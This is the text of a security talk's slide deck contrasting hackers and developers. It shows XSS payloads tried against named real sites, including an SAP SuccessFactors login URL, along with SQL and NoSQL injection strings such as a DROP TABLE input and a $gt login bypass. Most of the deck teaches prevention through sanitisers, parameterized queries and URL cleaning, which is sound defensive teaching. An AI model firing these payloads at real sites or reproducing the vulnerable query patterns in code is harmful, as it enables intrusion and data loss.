Soumyasanto Sen, #sitWDF
Hackers versus Developers
The GAME is ON
Introduction
Player 1: Hackers
• Expert: Skillful, with a detailed understanding of some area, often scarily deep.
• Unsocial: Don’t want to come out of their shell.
• Breaker: Hack apps.
• Cool: People think they are cool, and they think they are awesome.
• Super Power: They believe they can be "Masters of the Universe".
VS
Player 2: Developers
• Controller: Can use a lot of systems and languages and get them to talk to each other.
• Social: True and broad professionals who work with people and communicate well.
• Builder: Create apps.
• Boring: There are other, more important things in life than just coding.
• Super Power: They believe they can change this world.
Hacking looks ‘Simple’
XSS - Cross Site Scripting
JavaScript's Built-In Function(s)
decodeURI: decodes an encoded URI
http://t.home.news.cn/spIndex.action?ds=all&h=458&pageSize=20&temp=topicRoll&topic="xxxxxxxx'yyyyy</img
Possibilities:
• '-confirm(1)-'
• '-confirm`1`-'
http://t.home.news.cn/spIndex.action?ds=all&h=458&pageSize=20&temp=topicRoll&topic='-confirm(1)-'
var topic = decodeURI('');confirm(1);('');
var topic = decodeURI('');confirm(1);//');
replace (JS String replace method): returns a new string with a matched pattern replaced
http://www.zaobao.com.sg/search/site/"xxxxxxxx'yyyyy</img
Possibilities:
http://www.zaobao.com.sg/search/site/"-confirm(1)-"
http://www.zaobao.com.sg/search/site/");confirm(1);("
http://www.zaobao.com.sg/search/site/");confirm(1);// (does not work because // is filtered)
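Both cases above (the topic passed to decodeURI, the search term passed to replace) are injections into a JavaScript string literal inside an inline script block. As an added example, not code from the deck or from the sites shown, here is that template next to a hardened one that serialises the value with JSON.stringify and \u-escapes the characters the HTML parser acts on; the function names are ours.

```javascript
// Added example (not from the slides): embedding a query value in an inline
// <script> string literal, vulnerable form beside hardened form.

// What the affected pages do: paste the raw query value between the quotes of
// a JavaScript string literal. A quote in the value ends the literal and the
// rest of the value is parsed as code.
function renderVulnerable(topic) {
  return "<script>var topic = decodeURI('" + topic + "');</script>";
}

// Serialise a value for use inside a <script> block. JSON.stringify quotes
// and escapes the string for the JS parser; the extra replacements handle
// the characters the HTML parser cares about, so "</script>" inside the
// data cannot close the block, and U+2028/U+2029 cannot end a JS line.
function toScriptLiteral(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Hardened template: the value is always one JS string expression, whatever
// it contains; decodeURI on the client is no longer needed because the
// server emits the exact string.
function renderSafe(topic) {
  return '<script>var topic = ' + toScriptLiteral(topic) + ';</script>';
}
```

Because JSON \u-escapes round-trip, JSON.parse(toScriptLiteral(s)) === s for every string, so nothing is lost by the escaping.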
Easy Rules
Preventions
• XSS (Cross Site Scripting) Prevention Cheat Sheet from OWASP
• HTML5 Security Cheat Sheet
• Secure Coding Practice Guidelines
• Use clean URLs: https://www.site.com/news.php?id=1337 is way more tempting than https://www.site.com/news/some-news-or-today
• Sanitize inputs: a must for XSS
• Access control: http://www.site.com/phpmyadmin gave us access to the complete database! No injection, nothing
• Validate input.
• Use white-listing.
• Switch off error display.
Remember
“Successful hackers are not just good at hacking. What makes a great hacker successful is that they are excellent at understanding human nature.”
(Developers love their code, just like it’s their child.)
“Do not trust anything ever, especially when it comes to user input.”
“Security is about layers. It has to be, because no single layer can be guaranteed to actually be secure.”
Security is nothing but an ILLUSION.
Hacking looks ‘Simple’, even for SAP
Breaking SuccessFactors' XSS Filter
'-confirm(1)-' was enough to break SAP SuccessFactors' XSS filter and made hundreds of web applications vulnerable ...
https://jobs.sap.com/talentcommunity/login/?returnurl="xxxxxxxx'yyyyy</img
Possibilities:
• </script><script>alert(1)</script>
• '-confirm(1)-'
https://jobs.sap.com/talentcommunity/login/?returnurl=</script><script>alert(1)</script>
Next vectors, tried in turn:
• <img src=x onerror=alert(1)>
• <img src=x onerror=confirm(1)>
• <a href=javascript:confirm(1)>click</a>
• <p onmouseover=prompt(1)>IamParagraph</p>
• <details ontoggle=confirm(1)>
• <input type=search onsearch=confirm(1)>
Easy Filtering
Context Based Filtering
Protection against JavaScript execution via the `url` context, e.g. an img's src and/or an anchor's href attribute: implementation of `urlContextCleaner()`
External HTML Sanitizer
https://developers.google.com/caja/
The Caja project includes an HTML sanitizer.
Example:
<script src="html-sanitizer-minified.js"></script>
<script>
// URL policy: keep only http(s) URLs; anything else (e.g. javascript:) is dropped
function urlX(url) { if (/^https?:\/\//.test(url)) { return url; } }
// id/name policy: leave ids unchanged
function idX(id) { return id; }
// "<\/script>" inside the string stops the HTML parser from closing this script block early
alert(html_sanitize('<b>hello</b><img src="http://asdf"><a href="javascript:alert(0)"><script src="http://dfd"><\/script>', urlX, idX));
</script>
Node.js is a JavaScript runtime built on Chrome's V8 JavaScript engine
Hacking in Node.js
Of course, XSS
Improper parsing of nested tags and incomplete filtering of javascript: URIs:
<s <onmouseover="alert(1)"> <s onmouseover="alert(1)">This is a test</s>
<a href="javascriptJ a V a S c R iPt::alert(1)" "<s>">test</a>
(with any encoding)
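The `urlContextCleaner()` named on the Context Based Filtering slide is not reproduced on the page. As an added example (not the deck's code), here is such a cleaner for values that land in an href or src: instead of stripping "javascript:", which the incomplete-filtering vectors above get past, it normalises the value the way a browser does before reading the scheme and then allow-lists schemes. The scheme list and the function names are assumptions.

```javascript
// Added example, not the deck's urlContextCleaner(): a cleaner for values
// that land in a URL context (img src, a href). Scheme allow-list is ours.
const SAFE_SCHEMES = new Set(['http', 'https', 'mailto']);

// Attribute values are entity-decoded before the URL is parsed, so decode
// numeric references and the named ones relevant to schemes first.
const NAMED = { colon: ':', tab: '\t', newline: '\n', amp: '&', lt: '<', gt: '>', quot: '"' };
function codePoint(n) {
  return n > 0x10ffff ? '\uFFFD' : String.fromCodePoint(n);
}
function decodeEntities(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (m, h) => codePoint(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (m, d) => codePoint(parseInt(d, 10)))
    .replace(/&(colon|tab|newline|amp|lt|gt|quot);/gi, (m, n) => NAMED[n.toLowerCase()]);
}

// Returns the URL to emit, or '' as the safe fallback. The caller still has
// to attribute-encode the result when writing it into HTML.
function urlContextCleaner(raw) {
  if (typeof raw !== 'string') return '';
  // Browsers drop leading/trailing C0 controls and spaces and remove
  // tab/CR/LF anywhere, so "java\tscript:" is still javascript:.
  const url = decodeEntities(raw)
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '')
    .replace(/[\t\n\r]/g, '');
  // A scheme is a run of scheme characters ending in ':'; if the value does
  // not start with one, it is a relative URL.
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  if (m === null) {
    // Relative, but protocol-relative "//host" (or "\\host") would still
    // leave the site, so refuse that too.
    return /^[\\/]{2}/.test(url) ? '' : url;
  }
  return SAFE_SCHEMES.has(m[1].toLowerCase()) ? url : '';
}
```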
Server Side JavaScript Injection
Simple JS command:
response.end("Ended Response");
[pid 25170] execve("/bin/sh", ["/bin/sh", "-c", "ls -l user input"],
SQL and NoSQL Injection
Classic SQL injection bypass:
SELECT * FROM users WHERE username = '$username' AND password = '$password'
(SELECT * FROM users WHERE username = '' or 1=1--' AND password = '')
select author from books where id=$id -> (select author from books where id=2 or 1=1)
Statement stmt = conn.createStatement();
stmt.execute("INSERT INTO students VALUES('" + user + "')");
(Robert'); DROP TABLE students; --)
db.users.find({username: username, password: password}); (NoSQL)
{ "username": {"$gt": ""},
"password": {"$gt": ""} }
Secure Node.js
Protection
XSS Prevention
• Sanitize untrusted HTML:
http://jsxss.com/en/index.html
https://github.com/theSmaw/Caja-HTML-Sanitizer
https://www.owasp.org/index.php/Projects/OWASP_Node_js_Goat_Project
SSJSI Prevention
• Replace eval() with JSON.parse(); the parsed body is then data, not code, and is no longer injectable
• Use child_process.execFile or child_process.spawn instead of child_process.exec
SQL and NoSQL Injection Prevention
• Use parameterized SQL:
var q = 'SELECT name FROM books WHERE id = $1'; client.query(q, ['3'], function(err, result) {});
• Prepared statements prevent SQL injection:
PreparedStatement stmt = conn.prepareStatement("INSERT INTO students VALUES(?)");
stmt.setString(1, user);
stmt.execute();
• Use the $in operator to match values (NoSQL):
db.users.find({user: { $in: [user] }, pass: { $in: [pass] }});
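The {"$gt": ""} body from the previous slide against the $in suggestion above, as an added example that is not the deck's code: the vulnerable filter builder passes client values straight through, the hardened one rejects anything that is not a plain string and then wraps the literal with $in. The function names and bodies are ours.

```javascript
// Added example (not from the slides): building the Mongo login filter
// from a parsed JSON body, vulnerable form beside hardened form.

// Constructed bodies as a JSON body parser would hand them over.
const NORMAL_BODY = { username: 'alice', password: 'hunter2' };
const OPERATOR_BODY = { username: { $gt: '' }, password: { $gt: '' } };

// Vulnerable: the slide's db.users.find({username: username, password: password}).
// Whatever the client sent (string or operator object) becomes the filter.
function buildLoginFilterUnsafe(body) {
  return { username: body.username, password: body.password };
}

// Does a filter contain a query operator where a literal was expected?
// Walks nested objects, so {username: {$gt: ""}} is caught at any depth.
function containsOperator(value) {
  if (value === null || typeof value !== 'object') return false;
  return Object.keys(value).some(k => k.startsWith('$') || containsOperator(value[k]));
}

// Hardened: accept only primitive strings, so objects, arrays and numbers
// never reach the query builder; then match the literal with $in, as the
// slide suggests.
function buildLoginFilter(body) {
  const { username, password } = body;
  if (typeof username !== 'string' || typeof password !== 'string') {
    throw new TypeError('username and password must be strings');
  }
  return { username: { $in: [username] }, password: { $in: [password] } };
}
```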
Good Cause
Positive Side
• Social Good: finding solutions for social benefit, operations and emergencies
• Penetration Testing: finding vulnerabilities that an attacker could exploit
• Open Source: much open-source code is produced, tested and improved by hackers, often at hackathons
Top 10 fears of 2015
Negative Side
• Corruption of government officials (58.0%)
• Cyber-terrorism (44.8%)
• Corporate tracking of personal information (44.6%)
• Terrorist attacks (44.4%)
• Government tracking of personal information (41.4%)
• Bio-warfare (40.9%)
• Identity theft (39.6%)
• Economic collapse (39.2%)
• Running out of money in the future (37.4%)
• Credit card fraud (36.9%)
Source: Chapman University
Make Difference
Source: Scott Hanselman
Who is the Winner?
A "Hacker" is a state of mind.
A "Developer" is a state of function.
Choice is Yours
Thank You
Soumyasanto Sen
@soumyasanto
